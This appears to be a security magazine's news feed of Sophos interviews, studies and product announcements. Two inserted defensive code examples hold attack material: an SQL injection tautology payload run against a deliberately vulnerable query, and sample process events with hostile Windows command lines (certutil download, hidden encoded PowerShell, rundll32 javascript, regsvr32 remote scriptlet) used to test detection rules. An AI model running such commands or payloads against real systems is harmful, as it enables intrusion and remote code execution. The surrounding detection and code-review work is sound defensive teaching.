Sophos – Security Review Magazine https://securityreviewmag.com We bring you the latest from the IT and physical security industry in the Middle East and Africa region. Mon, 07 Apr 2025 08:21:57 +0000 en-US
AI Will Introduce New Threats as LLMs Take Over Automated Systems https://securityreviewmag.com/?p=28033 Mon, 07 Apr 2025 08:21:57 +0000 https://securityreviewmag.com/?p=28033 Chester Wisniewski, the Director and Global Field CTO at Sophos, says criminals are using AI exclusively for social scams and the social aspects of traditional attacks

How is generative AI being utilised to enhance cybersecurity measures today?
AI brings a wide variety of advantages to cybersecurity: automation, speed, scalability, enhanced detection, and generalisability. Without AI, rule-based systems need immense manual upkeep to handle the scale of modern threats. AI models can generalise by learning relationships between any number of potentially hundreds of features, while human analysts cannot write such complex rules. AI does, however, stand to introduce new threats as large language models take over automated systems.

What potential risks does generative AI introduce in the cybersecurity landscape, such as AI-driven cyberattacks?
For the most part, criminals are using AI exclusively for social scams and the social aspects of traditional attacks. AI allows for accurate translation at scale, which dramatically increases the quality of social scams. It can also be used to create high-quality phishing emails that are indistinguishable from the real thing.

AI chatbots are also very useful for initiating conversations with potential victims and setting the hook. Once a victim has been captured, humans usually take over but can still use AI to help with translation and grammar. One additional area where AI might be useful is in assessing the value of large volumes of stolen data. Using AI a criminal might be quicker to identify high-value data and either sell it at a premium or use it as an extra pressure mechanism against the victim.

What ethical concerns arise when using generative AI in cybersecurity, and how can they be addressed?
In most applications there aren’t many ethical concerns. Clearly using AI to generate malicious code or to gather open source intelligence should be done with caution, but most cybersecurity applications don’t involve many ethical dilemmas.

What challenges do cybersecurity teams face when integrating generative AI tools into their workflows?
Two primary concerns come to mind. First, when you are using generative AI to help you write code, you must do very thorough reviews to be sure you are not introducing vulnerabilities. Generative AI has been known to make up the names of libraries that don’t exist or recommend code snippets containing basic programming mistakes like allowing SQL injection attacks or buffer overflow attacks. Second, we must verify the outputs when it really matters. Frequently mild inaccuracies may not matter, but in circumstances where it is of great importance, we have to double-check the outputs to ensure the accuracy of the results.
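The two review checks described in that answer, as an added example that is not Sophos’ code and not part of the interview: a small AST pass that flags `execute()`-style calls whose query text is assembled at runtime, a second pass that lists imported modules that do not resolve in the current environment (a symptom of a made-up library name), and the injectable query beside its parameterised form, exercised against an in-memory SQLite table. The snippet in `GENERATED_SNIPPET`, the package name `fastsqlhelper` and all function names are assumptions constructed for the example.

```python
"""Review aids for assistant-generated Python, plus the vulnerable query beside
its parameterised form. Added example; not code from the page or from Sophos."""
import ast
import importlib.util
import sqlite3

# Constructed sample: the kind of snippet an assistant might propose.
# 'fastsqlhelper' is a hypothetical package name chosen to be unresolvable.
GENERATED_SNIPPET = '''
import sqlite3
import fastsqlhelper

def find_user(conn, username):
    cur = conn.cursor()
    cur.execute(f"SELECT id FROM users WHERE name = '{username}'")
    return cur.fetchone()
'''

_EXEC_NAMES = {"execute", "executemany", "executescript"}


def find_unsafe_sql(source: str) -> list[int]:
    """Line numbers of execute()-style calls whose query text is built at
    runtime (f-string, '+' or '%' concatenation, str.format)."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)):
            continue
        if node.func.attr not in _EXEC_NAMES or not node.args:
            continue
        query = node.args[0]
        dynamic = (
            isinstance(query, ast.JoinedStr)
            or (isinstance(query, ast.BinOp) and isinstance(query.op, (ast.Add, ast.Mod)))
            or (isinstance(query, ast.Call) and isinstance(query.func, ast.Attribute)
                and query.func.attr == "format")
        )
        if dynamic:
            hits.append(node.lineno)
    return hits


def find_unresolvable_imports(source: str) -> list[str]:
    """Top-level module names imported by `source` that do not resolve in the
    current environment. Each one needs a human check before anyone runs
    `pip install`: an invented name may be unregistered, or already registered
    by someone waiting for exactly that mistake."""
    missing = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names = [node.module]
        else:
            continue
        for name in names:
            top = name.split(".")[0]
            try:
                spec = importlib.util.find_spec(top)
            except (ImportError, ValueError):
                spec = None
            if spec is None:
                missing.add(top)
    return sorted(missing)


# The generated query, reproduced so it can be exercised, and its fix.
def find_user_unsafe(conn, username):
    cur = conn.cursor()
    cur.execute(f"SELECT id FROM users WHERE name = '{username}'")  # injectable
    return cur.fetchone()


def find_user_safe(conn, username):
    cur = conn.cursor()
    cur.execute("SELECT id FROM users WHERE name = ?", (username,))  # bound parameter
    return cur.fetchone()


def demo() -> dict:
    """Run both review checks on the snippet, then show a tautology payload
    returning a row from the generated query and nothing from the fixed one."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users (name) VALUES (?)", [("alice",), ("bob",)])
    payload = "nobody' OR '1'='1"  # constructed injection payload
    return {
        "unsafe_sql_lines": find_unsafe_sql(GENERATED_SNIPPET),
        "unresolvable_imports": find_unresolvable_imports(GENERATED_SNIPPET),
        "unsafe_result": find_user_unsafe(conn, payload),
        "safe_result": find_user_safe(conn, payload),
    }


if __name__ == "__main__":
    print(demo())
```

The AST pass is deliberately narrow (it only looks at the first argument of `execute`-like calls), so it is a triage aid for reviewing generated code, not a substitute for a full static-analysis tool; the import check likewise only tells you that a name is unknown here, and the decision about whether to install it remains a human one.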

Are there any notable examples of generative AI successfully preventing or mitigating cyberattacks?
Not that I am aware of. Traditional machine learning and neural-network malware detection models prevent attacks around the clock, but I am not aware of generative AI being used in this way to date.

How do you see generative AI evolving in the cybersecurity domain over the next few years?
I think the real promise is in alert triage and language translation capabilities. Of course, these technologies are available now from ourselves and other vendors, but as these capabilities mature, they will become increasingly important for smart automation and aiding human analysts. We are also likely to see AI automation of bug discovery in code before it ships to customers, preventing vulnerabilities, and improved detection of targeted phishing attacks in email solutions.

What role does human oversight (HITL) play in ensuring generative AI systems are effectively managing cybersecurity threats?
This is critically important. The machines are excellent at processing vast amounts of data and helping make sense of it, but they lack intuition, creativity, and context. Humans can take this reduced flow of information and add that intelligence to achieve superior outcomes.

How can smaller organisations with limited budgets incorporate generative AI for cybersecurity?
Most smaller organisations will benefit from AI through its integration into their existing tools and through their service providers. Much of the efficiencies gained by smart applications of this technology will allow for more affordable services from security providers and easier-to-use tools.

What best practices would you recommend for implementing generative AI tools while minimising risks?
If using AI models hosted in public clouds or by service providers, caution must be exercised not to process sensitive information using these tools. Risks can be minimised by choosing providers in countries with privacy laws in line with your responsibilities, but caution should still be exercised. For the most sensitive types of information, it would be best to host it on-premises or in a private cloud instance that is not shared with other tenants.

]]>
Sophos Study: MDR Users Claim 97.5% Less in Cyber Insurance https://securityreviewmag.com/?p=27934 Tue, 18 Mar 2025 06:56:54 +0000 https://securityreviewmag.com/?p=27934 Leading cybersecurity provider Sophos has released findings from a new study quantifying the financial impact of various cybersecurity controls on cyber insurance claims. The research compares the effect of endpoint solutions, EDR/XDR technologies, and MDR services on claim amounts, offering valuable insights for both insurers and organizations.

Sally Adam, Senior Director, Solution Marketing at Sophos, said, “Every year, organisations spend huge amounts of money on their cybersecurity. By quantifying the impact of controls on the outcome of cyberattacks, this study enables them to focus their investments on the most cost-effective options. At the same time, insurers have a major influence on cybersecurity spending through the controls they require of organisations wishing to be covered and the discounts they offer when a given scheme is in place. This study enables them to encourage investments that can make a real difference to incident outcomes and the resulting claim amounts.”

The Sophos study reveals a dramatic difference in cyber insurance claims: organizations using MDR services claim a median compensation of just $75,000, a staggering 97.5% less than the $3 million median claimed by organizations relying solely on endpoint solutions. This means that endpoint-only users typically claim 40 times more in the event of an attack. The study attributes this significant reduction to the rapid threat detection and blocking capabilities of MDR services, which can effectively prevent extensive damage.

The study also highlights a clear benefit to combining EDR or XDR with endpoint solutions, as the average insurance claim for users of these tools is just $500,000, which is one-sixth of the $3 million average claim for those using only endpoint solutions.

The Sophos study indicates that the predictability of cyber insurance claims varies significantly depending on the security controls in place. Claims from organizations utilizing MDR services show the highest predictability, suggesting consistent and reliable threat mitigation. This is likely due to the 24/7 expert monitoring, investigation, and response that allows for swift action against threats at any time. Conversely, claims from users of EDR/XDR tools are the least predictable, implying that their effectiveness in preventing major damage heavily depends on the user’s expertise and speed of response.

The Sophos study also reveals significant differences in recovery times from ransomware attacks. Endpoint solution users average a 40-day recovery, while EDR/XDR users take the longest at 55 days. In stark contrast, organizations using MDR services recover the fastest, with an average downtime of just three days. These findings underscore MDR’s effectiveness in minimizing the impact of cyberattacks and highlight the less predictable recovery experiences associated with EDR/XDR tools, whose success is dependent on user expertise.

Adam concludes, “The research confirms what many people instinctively know: the type of security solution used has a significant impact on cyber insurance claims. Cyberattacks are inevitable, but defences are not. These results are a useful tool for organisations wishing to optimise their cyber defence and their return on investment in cybersecurity. They will also be useful for insurers looking to reduce their exposure and offer suitable policies to their customers.”

]]>
“Don’t Be Discouraged if You’re the Only Woman in the Room” https://securityreviewmag.com/?p=27852 Wed, 05 Mar 2025 10:06:59 +0000 https://securityreviewmag.com/?p=27852 Morgan Demboski, the Threat Intelligence Analyst at Sophos, says the biggest challenge for women in technology is the lack of representation and female role models

Can you share your journey into the security world? What inspired you to pursue a career in this field?
I may not have originally planned to enter the tech industry, but my years of experience have shown me the significant impact of my work on our customers. Tactical threat intelligence examines the behaviors and observables of an attack—such as actions, tools, and infrastructure—while strategic threat intelligence focuses on broader aspects, including motivations, targeting, and attribution.

Early in my career, I often felt hesitant, particularly as the only woman on my team. However, I quickly realized that expertise, not gender, defines success in this field. As cybersecurity continues to evolve at an unprecedented pace, new challenges and threats emerge daily, making adaptability and resilience essential. No two days are the same, and the dynamic nature of the industry offers endless opportunities for growth and innovation.

What were some of the biggest challenges you faced as a woman, and how did you overcome them?
The biggest challenge for women in technology often depends on their specific role, but a common obstacle is the lack of representation and female role models. While progress has been made in improving gender diversity, it can still be daunting to work in environments where leadership is predominantly male. Seeing few women in senior positions can make career advancement feel like an uphill battle.

However, the industry is becoming more inclusive through initiatives such as women-in-cybersecurity programs and technical workshops designed to support and upskill women. Expanding these efforts is crucial in creating a more accessible and equitable industry for future generations.

How do you describe your leadership style, and how has it evolved over time?
I would describe my leadership style as collaborative and adaptive. In cyber threat intelligence, no one person has all the answers, so I prioritize teamwork, knowledge-sharing, and empowering others to contribute their unique expertise. Over time, my leadership style has evolved as I’ve gained more experience and confidence. Early on, I focused a lot on proving myself, but I’ve learned that great leadership isn’t about having all the answers—it’s about creating space for others to grow and succeed.

What strategies do you use to motivate and empower your team?
I actively support and mentor women in cyber threat intelligence, helping them develop their skills and advance in the industry. Industry conferences provide a great platform to connect with and guide women new to the field. At Sophos, I take pride in our commitment to addressing the gender pay gap. Through comprehensive reviews, structured budgets, and sustainable processes, our HR and leadership teams ensure equitable pay and career growth opportunities for women in cybersecurity.

Have you had any mentors or role models who have significantly influenced your career? How did they impact your journey?
Sophos has an incredible internal resource group, Sophos Women in Tech (SWiT), dedicated to empowering women in technology. Through initiatives like addressing global gender pay gaps, promoting STEM education for young girls, and providing mentorship and training, SWiT helps women build confidence in key areas such as negotiation and leadership. Being part of such a network has reinforced the importance of mentorship and advocacy in advancing women in technology, shaping my own commitment to supporting others in the field.

What advice would you give to young women aspiring to enter the security world?
To young women entering cybersecurity, don’t be discouraged if you’re the only woman in the room. Your value is defined by your expertise, not your gender. While women remain underrepresented in the field, this is an opportunity to drive change, reshape industry culture, and pave the way for future generations. Focus on continuous learning and embrace the journey of growth. With time and experience, your insights and leadership will naturally evolve, positioning you to guide and inspire others in the field.

Can you highlight some of your proudest achievements in your career so far?
I have several proud achievements, but I think I am most proud of my recent security conference presentations. Last year, I was accepted with a colleague to speak at Black Hat USA 2024 in Las Vegas on a years-long investigation we had conducted on a Chinese state-sponsored cyber espionage campaign targeting a government organization in Southeast Asia. We presented to an audience of over 700 people and it was received with high regard, and I definitely consider it one of the highlights of my career.

How do you manage work-life balance, and what tips do you have for other women striving to achieve this balance?
Managing work-life balance in cyber threat intelligence can be challenging, especially in a field where threats don’t adhere to a 9-to-5 schedule. For me, balance comes from setting clear boundaries and prioritizing self-care just as much as my work. I think one of the best things you can do for yourself is to have a hobby completely unrelated to work. Cybersecurity can be intense, and I find it important to have a creative outlet. I personally enjoy pottery, painting, and bowling as my weekly hobbies, which helps me reset my mind and prevent burnout.

]]>
Sophos Completes Secureworks Acquisition https://securityreviewmag.com/?p=27748 Wed, 05 Feb 2025 06:13:10 +0000 https://securityreviewmag.com/?p=27748 Sophos and Secureworks have announced the completion of Sophos’ acquisition of Secureworks. The all-cash transaction values Secureworks at approximately $859 million. With the completion of the acquisition, Secureworks’ common stock has ceased trading on Nasdaq. Thoma Bravo, a leading software investment firm, backs Sophos.

With this acquisition, Sophos is now the leading pure-play cybersecurity provider of Managed Detection and Response (MDR) services, supporting more than 28,000 organizations of all sizes worldwide. The combination will enable Sophos to deliver an unparalleled security operations platform, featuring hundreds of built-in integrations for adaptive protection, detection and response for mitigating cyberattacks. The open and scalable platform helps organizations, especially those with diverse IT estates, safeguard current and future technology investments, providing greater operational efficiencies and return on cybersecurity spend. Sophos X-Ops is also expanding its threat intelligence and security services capabilities by adding the Secureworks Counter Threat Unit and security operations and advisory teams.

As a channel-first cybersecurity provider, Sophos remains unwavering in its commitment to delivering cutting-edge security services and technologies that empower our global community of resellers, Managed Service Providers (MSPs) and Managed Security Services Providers (MSSPs). This includes expanding their reach, enhancing operational scalability and providing stronger defences to the countless organizations that need the ability to effectively defend against today’s constant and complex cyberattacks.

“The market is embracing MDR as a clear means to deliver positive cybersecurity outcomes, and this has meant rapid growth in the category,” said Joe Levy, CEO, Sophos. “Sophos is differentiated by our very mature competencies in ransomware detection, malware analysis and threat actor tradecraft. These defences are further augmented by Sophos’ native artificial intelligence (AI), first innovated by our globally peer-recognised AI team nearly a decade ago, and embedded in our MDR, endpoint, network, email, and cloud security to more effectively neutralize and stop threats. With the integration of Secureworks, our expanded services and product portfolio will provide even stronger end-to-end security solutions that will include identity threat detection and response (ITDR), next-gen SIEM and managed risk, all in a single open platform. We will also be able to further advance our AI, threat intelligence and attack research through more diverse and deeper global telemetry that is analyst-tuned for the real world. At every level, we are very excited about this next accelerated chapter for Sophos.”

In the near term, Sophos and Secureworks are operating business as usual, working with our respective channel partners, MSPs and MSSPs worldwide to distribute our existing security services and technology. Both companies’ sales and customer experience groups will operate to support existing customers, assist with renewals and develop current and new business opportunities. Sophos protects more than 600,000 customers worldwide with its portfolio of MDR, endpoint, network, email, and cloud security solutions that integrate and adapt to provide real-time defence through the Sophos Central platform.

Under the terms of the agreement, Sophos acquired Secureworks in an all-cash transaction valued at approximately $859 million. Secureworks shareholders, including Dell Technologies, will receive $8.50 per share in cash. This represents a 28% premium to the unaffected 90-day volume-weighted average price (VWAP). Kirkland & Ellis LLP acted as legal counsel to Sophos; Goldman Sachs & Co. LLC, Barclays, BofA Securities, HSBC Securities (USA) Inc., and UBS Investment Bank acted as financial advisors and provided debt financing for the transaction. Piper Sandler & Company and Morgan Stanley & Co. LLC acted as financial advisors to Secureworks, and Paul, Weiss, Rifkind, Wharton & Garrison LLP acted as legal counsel.

]]>
GenAI Flaws Worry 89% of IT Leaders, Says Sophos https://securityreviewmag.com/?p=27712 Thu, 30 Jan 2025 06:27:46 +0000 https://securityreviewmag.com/?p=27712 Sophos has released a new report, “Beyond the Hype: The Business Reality of AI for Cybersecurity,” which surveyed 400 IT leaders on their use of AI in security. The survey found that, despite 65% having adopted generative artificial intelligence (GenAI) capabilities, 89% of IT leaders are concerned that flaws in GenAI cybersecurity tools could put their organisation at risk.

Additionally, according to new Sophos X-Ops research, “Cybercriminals Still Not Getting on Board the AI Train (Yet),” released today, there has been a slight but noteworthy shift in how cybercriminals use AI. After investigating several underground forums, Sophos X-Ops found that, while there’s still scepticism about GenAI, some criminals are using it to automate mundane tasks, such as crafting bulk emails and analysing data. Others are incorporating it into spam and social engineering toolkits.

“As with many other things in life, the mantra should be ‘trust but verify’ regarding generative AI tools. We have not taught the machines to think; we have simply provided them with the context to speed up the processing of large quantities of data,” said Chester Wisniewski, director, global field CTO, Sophos. “The potential of these tools to accelerate security workloads is amazing, but it still requires the context and comprehension of their human overseers for this benefit to be realised.”

With some form of AI embedded in the cybersecurity infrastructure of 98% of organisations surveyed, IT leaders expressed concern about potential over-reliance on AI, with 87% of respondents stating they were concerned about a resulting lack of cybersecurity accountability. Different-sized organisations expressed different priorities for utilising GenAI.

While large organisations (those with more than 1,000 employees) are prioritising improved protection, respondents with 50-99 employees rated reducing burnout as their top desired benefit from GenAI tools. However, complicating matters, across all sizes of organisations, 84% of leaders surveyed said they were concerned about pressure to reduce cybersecurity professional headcount due to unrealistic expectations about AI’s abilities to replace human operators.

Other Key Findings from the “Beyond the Hype” Report:

  1. Costs of GenAI Are Hard to Quantify: 75% of IT leaders agree that the costs of GenAI in cybersecurity products are hard to quantify.
  2. Companies Are Counting on Savings from GenAI: While 80% of IT leaders believe that GenAI will significantly increase the cost of cybersecurity tools, most organisations believe GenAI offers a path to lowering overall cybersecurity expenditure with 87% of respondents believing the savings of GenAI will offset the costs.
]]>
Sophos MDR Protects 26,000 Customers Globally with Latest Innovations https://securityreviewmag.com/?p=27689 Thu, 23 Jan 2025 11:33:08 +0000 https://securityreviewmag.com/?p=27689 Sophos has announced that its Sophos Managed Detection and Response (MDR) service has reached a major milestone, now protecting more than 26,000 organizations globally, growing its customer base by 37% in 2024. This achievement highlights the increasing demand for Sophos’ proactive, expert-led security solutions, which help organizations of all sizes stay protected 24/7 against increasingly sophisticated cyber threats, including the most advanced ransomware, business email compromise (BEC) and phishing attacks.

Sophos MDR offers a comprehensive suite of capabilities that go beyond standard threat containment to include full-scale incident response, such as root cause analysis, the removal of malicious tools or artefacts used by attackers, and investigations across customers’ environments to ensure adversaries are fully ejected to prevent another attack. What further differentiates Sophos is that these incident response services are included with Sophos MDR on an unlimited basis, meaning customers are not additionally charged and there is no limit on the number of incident response hours. Sophos MDR Complete also includes a breach protection warranty covering up to $1 million in incident response expenses. Sophos provides flexibility for how customers can work with the MDR analysts, including the ability to pre-authorize them to contain an active threat.

Sophos has made significant investments into its MDR offering with increased analyst capacity, AI-assisted workflows, new features and expanded integrations to help deliver the best possible outcomes through improved protection, detection and investigation of threats. Sophos has added the following new features:

  1. Proof of Value: New Sophos MDR service insights to explain the MDR team’s actions including highlighting the human hours spent threat hunting and creating and tuning detections. High-value dashboard enhancements include details of MITRE ATT&CK tactics uncovered in proactive threat hunts conducted by Sophos’ MDR team, MDR analyst coverage, case investigation summaries and an account health check status.
  2. Enhanced Security for Microsoft Customers: New Sophos-proprietary detections for Microsoft Office 365 identify threats including business email compromise and adversary in the middle account takeover attacks, independent of the customer’s Microsoft license level.
  3. Expanded Compatibility with Third Parties: This expanded ecosystem of turnkey integrations with third-party cybersecurity and IT tools includes a new Backup and Recovery integration category.
  4. Proactive Vulnerability Mitigation: Sophos Managed Risk powered by Tenable provides attack surface vulnerability management as a new managed service option for Sophos MDR customers.
  5. Efficiency and Automation: Sophos MDR has added AI-powered workflows to streamline operational processes and drive better security outcomes for our customers. This innovation delivers a reduced mean time to respond (MTTR) through more efficient triage, while also ensuring that all legitimate threats are rapidly investigated. This enables analysts to concentrate on other tasks such as threat hunting, account health monitoring and detection engineering.

“Attackers are continuously advancing their tactics to outmanoeuvre traditional security defences,” said Rob Harrison, senior vice president of product management at Sophos. “Our customers rely on Sophos MDR to help their organizations tackle today’s threats 24/7 with full-scale incident response to remove active adversaries and conduct root cause analysis to identify the underlying issues that led to an incident. We’re consistently evolving our solutions with new offerings and integrations, just like attackers are constantly evolving their tactics, so customers can disrupt threats before they escalate into destructive attacks.”

]]>
Outlook 2025: Multi-Modal AI Systems Will be Used to Defend Against Phishing https://securityreviewmag.com/?p=27570 Wed, 18 Dec 2024 07:22:05 +0000 https://securityreviewmag.com/?p=27570 John Shier, the Field CTO at Sophos, says in addition to multi-modal AI systems, incremental improvements in AI technologies, across all its different modalities, will continue to be in demand from all industries

How did the industry and your company fare in 2024, and what were the key highlights?
One highlight in 2024 was the introduction of the “Secure by Design” initiative spearheaded by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), of which Sophos was a founding signatory. Getting technology vendors to improve the security and quality of their products from the start will bring long-lasting improvements to our collective security.

Looking at the cybercrime scene, we saw continued attacks against supply chains that had widespread impacts. The most recent example, the ransomware attack against supply chain management company Blue Yonder, disrupted businesses globally. These kinds of attacks not only have amplified impacts but also increase the pressure on victim organizations to pay the extortionists.

What opportunities do you foresee for 2025, and how do you plan to leverage them?
While large language models (LLMs) have been a focal point in AI, we anticipate that their advancement will be incremental rather than revolutionary in 2025. Multi-modal AI systems will be increasingly used to defend against never-before-seen phishing and other social scams. These systems could become instrumental in both cybersecurity defence and cybercriminal attack strategies.

What major challenges did you encounter in 2024, and how did you address them?
In our latest Active Adversary report, we found that cybercriminals are increasingly hiding in plain sight on targets’ Windows networks by taking advantage of trusted Microsoft binaries. Between 2023 and the first half of 2024, abuse of trusted applications grew by 51%.

Understanding how attackers are abusing these living off-the-land binaries (LOLBins) enabled Sophos to continue adding detections for malicious and suspicious activities resulting from their use. These additional detections mean that defenders can detect attacker activity sooner and therefore respond quickly to nascent attacks before they become critical.
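An added example of the kind of LOLBin detection the answer refers to, written here for illustration and not Sophos’ detection content: command-line rules for a few commonly abused Windows binaries, plus a parent/child rule for Office applications launching script hosts, evaluated over constructed process-creation events. The event field names, rule names, ATT&CK mappings chosen for each rule, and the hostnames and paths in the sample events are all assumptions; nothing here is a real telemetry schema.

```python
"""Rule-based detection of suspicious living-off-the-land binary (LOLBin) use,
run over constructed Windows process-creation events. Added example; the rules
are illustrative and are not Sophos' detection content."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    image: str             # basename of the executing binary, lower-case
    pattern: re.Pattern    # tested against the full command line
    technique: str         # MITRE ATT&CK ID, for triage context


RULES = [
    Rule("certutil download or decode", "certutil.exe",
         re.compile(r"-(urlcache|decode|encode)\b", re.I), "T1105"),
    Rule("mshta remote or inline script", "mshta.exe",
         re.compile(r"https?:|javascript:|vbscript:", re.I), "T1218.005"),
    Rule("rundll32 script or scriptlet", "rundll32.exe",
         re.compile(r"javascript:|url\.dll|\.sct\b", re.I), "T1218.011"),
    Rule("regsvr32 remote scriptlet", "regsvr32.exe",
         re.compile(r"/i:\s*https?:|scrobj\.dll", re.I), "T1218.010"),
    Rule("bitsadmin transfer", "bitsadmin.exe",
         re.compile(r"/transfer\b|/addfile\b", re.I), "T1197"),
    Rule("powershell encoded or downloading", "powershell.exe",
         re.compile(r"-e(nc|ncodedcommand)?\s|downloadstring|invoke-webrequest|\biwr\b", re.I),
         "T1059.001"),
]

# A script host launched by an Office application is suspicious on its own,
# whatever the arguments look like.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe", "cmd.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list[dict]:
    """Return one alert per rule that fires on a single process-creation event."""
    image, parent, cmd = basename(event["image"]), basename(event["parent"]), event["cmdline"]
    alerts = [
        {"event_id": event["id"], "rule": r.name, "technique": r.technique}
        for r in RULES if image == r.image and r.pattern.search(cmd)
    ]
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        alerts.append({"event_id": event["id"], "rule": f"{parent} spawned {image}",
                       "technique": "T1204.002"})
    return alerts


def detect(events: list[dict]) -> list[dict]:
    return [alert for event in events for alert in evaluate(event)]


# Constructed events; hosts, paths and the encoded blob are invented.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://files.example.invalid/up.exe C:\\Users\\Public\\up.exe"},
    {"id": 2, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -hashfile C:\\installers\\setup.msi SHA256"},          # legitimate use
    {"id": 3, "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"id": 4, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write()'},
    {"id": 5, "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},               # legitimate use
    {"id": 6, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32 /s /n /u /i:http://files.example.invalid/p.sct scrobj.dll"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Events 2 and 5 show why command-line context matters: `certutil` and `rundll32` are used legitimately all day, so a rule keyed on the binary name alone would drown the analyst in noise, while a rule keyed on the abusive argument pattern (or on an unusual parent such as WINWORD.EXE) fires only on the cases worth a look.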

Which emerging technologies do you believe will be in high demand in 2025, and why?
In addition to multi-modal AI systems, incremental improvements in AI technologies, across all its different modalities, will continue to be in demand from all industries. General hardware improvements in the areas of processing, memory and storage will help fuel AI improvements and other technological breakthroughs. Hopefully, the widespread application of renewable energy technologies will also be in high demand to combat the devastating environmental impacts of AI and other energy-intensive technologies.

If you could give one piece of advice to businesses preparing for 2025, what would it be?
Regarding cybersecurity practice, our suggestions to the channel are to:

  • Strengthen Endpoint Protection and Managed Detection & Response (MDR) Services as sophisticated malware and ransomware continue to be top threats in the META region, targeting both SMBs and large enterprises.
  • Offer Cloud Security Solutions as Cloud adoption is accelerating in META, and partners must secure their customers’ data, applications, and infrastructure in the cloud.
  • Educate and implement Zero Trust Network Access (ZTNA) and SASE frameworks for customers transitioning to hybrid work environments.
  • Offer flexible subscription-based or pay-as-you-go cybersecurity solutions tailored to SMBs and startups as many organizations in the region face budget constraints but require enterprise-grade protection.
  • Help customers comply with regional data protection regulations like GDPR, Saudi’s PDPL, or South Africa’s POPIA. Regulatory enforcement is becoming stricter, and organizations need expert guidance to avoid penalties.

What will be your primary focus areas and strategic priorities for 2025?
Below are the top 3 priorities for 2025 apart from enhancing our partner program:

  1. Build Managed Services Capabilities (MSP) Priority: In 2025, we aspire to transition the channel into offering Managed Services through the Sophos MSP Connect program.
  2. Focus on Solution Bundling and Cross-Selling: we have created a 2025 plan to engage and encourage partners to bundle Sophos solutions (e.g., endpoint, firewall, MDR, and cloud security) to maximize value per customer.
  3. Co-Marketing and Demand Generation: Our Marketing team shall engage with channels to drive demand through joint marketing campaigns and events for lead generation and market penetration.
]]>
Sophos to Highlight its MDR Among Other Solutions at Black Hat MEA https://securityreviewmag.com/?p=27468 Tue, 26 Nov 2024 07:23:04 +0000 https://securityreviewmag.com/?p=27468 Harish Chib, VP Emerging Markets, Middle East & Africa, Sophos, says his company will help businesses to protect their networks from even the most sophisticated attacks

How has the regional threat landscape evolved over the past few months?
The MENA region’s cybersecurity landscape is evolving, with governments placing greater emphasis on data privacy and protection regulations. Sophos is well-positioned to help organizations in the region meet these requirements through our cutting-edge solutions, including endpoint protection, firewalls, and managed services like MDR (Managed Detection and Response).

What are the five major cybersecurity predictions for the upcoming months?

  1. Supply Chain Attacks – The Comeback Threat: One of the most disruptive cybersecurity events of the past year, the ransomware attack on CDK Global—a leading software provider for car dealerships—highlighted the broad-reaching impact of supply chain attacks. The incident, which disrupted thousands of U.S. car dealerships for over a week, is a stark reminder of the cascading consequences that such attacks can have on interconnected industries.
  2. Ransomware Actors Pivot to Cloud Assets Amid Endpoint Security Gains: As organizations implement more advanced endpoint security tools, such as Sophos Endpoint Detection and Response (EDR) and Multi-Factor Authentication (MFA), attackers are increasingly targeting cloud environments, which are often less protected by MFA and other controls. With account access harder to compromise due to MFA, attackers are now exploiting cloud assets and authentication tokens to gain footholds.
  3. Cybercriminals Use Noise and Distraction Tactics to Disorient Defenders: To evade detection, cybercriminals are using distraction tactics to pull incident responders’ attention away from their primary objective. By creating “noise”—such as minor attacks or false incidents—attackers can overwhelm response teams, allowing larger threats to advance undetected.
  4. Generative AI Lowers the Barrier for Cybercrime, Increasing Attack Volume: Generative AI platforms have made it easier for less-skilled attackers to create and launch credible cyberattacks. By using AI models to generate phishing emails, malware code, and other attack tools, novice attackers are flooding the digital landscape with new threats, creating a significant resource strain for defenders.
  5. Fatigue and Burnout Among Cybersecurity Professionals Reach Critical Levels: Cybersecurity teams are grappling with increasing levels of burnout as they contend with complex and evolving threats, a shortage of skilled professionals, and rising expectations. The intense workload, coupled with continuous cyber incidents, is driving high attrition rates, with many seasoned professionals choosing to leave the field.

What are your plans for Black Hat MEA?
At Black Hat MEA, Sophos will showcase our latest advancements in cybersecurity, particularly focusing on how our solutions can support organizations in Saudi Arabia in their journey toward Vision 2030. One key area of emphasis will be the Sophos Firewall, which offers robust network security with advanced threat protection, web filtering and secure VPN access, ensuring that businesses can protect their networks from even the most sophisticated attacks.

We will also highlight Sophos Managed Detection and Response (MDR), our comprehensive threat detection service that combines machine learning and expert human analysis. With MDR, our security team actively monitors, detects and responds to threats 24/7, allowing organisations to focus on their core business while maintaining a strong cybersecurity posture. By integrating Sophos Firewall and MDR, we provide end-to-end security coverage that aligns with the Kingdom’s strategic goals for a resilient and secure digital infrastructure.

Tell us about your regional commitment in terms of expanding reach through partnerships.
